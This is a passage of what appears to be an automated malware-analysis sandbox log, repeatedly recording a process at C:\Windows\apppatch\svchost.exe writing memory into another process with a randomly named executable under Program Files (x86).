    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1572000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 15C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E35000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2310000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2311000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2312000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2365000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B60000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B61000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B62000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2BB5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DE2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E35000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2380000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2381000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2382000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 23D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2FC0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2FC1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2FC2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3015000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AB5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2790000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2791000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2792000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27E5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2A15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3120000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3121000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3122000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3175000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B40000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B41000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B42000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B95000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2680000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2681000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2682000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 26D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2300000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2301000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2302000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2355000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1505000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 620000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 621000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 622000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 675000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D30000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D31000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D32000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D85000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 10F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 10F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 10F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1145000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1620000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1621000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1622000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1675000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A70000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A71000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A72000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: AC5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: B80000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: B81000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: B82000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: BD5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: F50000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: F51000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: F52000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FA5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FD0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FD1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FD2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1025000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1335000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DD0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DD1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DD2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E25000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1225000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: BB0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: BB1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: BB2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C05000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 7E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 7E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 7E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 835000Jump to behavior
